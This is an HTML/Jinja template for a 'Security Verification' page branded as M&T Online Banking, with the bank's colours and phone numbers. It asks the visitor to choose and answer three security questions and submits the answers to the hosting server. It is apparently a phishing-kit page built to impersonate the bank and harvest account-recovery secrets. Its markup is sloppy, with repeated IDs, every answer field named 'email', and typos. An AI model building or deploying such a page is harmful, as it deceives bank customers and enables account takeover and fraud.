{% extends 'base.html'%} {%block body%}


<div style="padding-top: 5px" class="middle-form">
  <p class="go-left" style="font-size: 30px; color: #007856; text-align: center;">
    Security Verification <br />
  </p>
 
  <div class="submitForm">
    <form action="" method="post">
      <div class="input-field">
        <label for="question1">Question 1</label>
        <select name="question1" id="question1">
            <option value="">Select</option>
            <option value="wedding_reception">Name of the place where your wedding reception was help</option>
            <option value="maid_of_honor">What is the first name of the maid of honor at your wedding</option>
        </select>
      </div>
      <div class="input-field">
        <label for="question1_ans">Answer</label>
          <input id="question1_ans" name="email" type="text">
      </div>

      <!-- Question 2 -->
      <div class="input-field">
        <label for="question1">Question 2</label>
        <select name="question1" id="question1">
            <option value="">Select</option>
            <option value="wedding_reception">Name of the place where your wedding reception was help</option>
            <option value="maid_of_honor">What is the first name of the maid of honor at your wedding</option>
        </select>
      </div>
      <div class="input-field">
        <label for="question1_ans">Answer</label>
          <input id="question1_ans" name="email" type="text">
      </div>

      <!-- Question 3 -->
      <div class="input-field">
        <label for="question1">Question 3</label>
        <select name="question1" id="question1">
            <option value="">Select</option>
            <option value="wedding_reception">Name of the place where your wedding reception was help</option>
            <option value="maid_of_honor">What is the first name of the maid of honor at your wedding</option>
        </select>
      </div>
      <div class="input-field">
        <label for="question1_ans">Answer</label>
          <input id="question1_ans" name="email" type="text">
      </div>
      
  
  <button style="width: 100%; margin-top: -5px;" type="submit">Verify</button>
</form>
    <br />
    
    <hr>

    <p>Have questions about M&T Online Banking?</p>
    <a href="">Personal Accounts: 1-800-790-9130</a>
    <p>Monday - Friday 8am - 9pm ET</p>
    <p>Saturday - Sunday 9am - 5pm ET</p>

    <a href="">Business Accounts: 1-800-724-6070</a>
  </div>
</div>


{%endblock%}
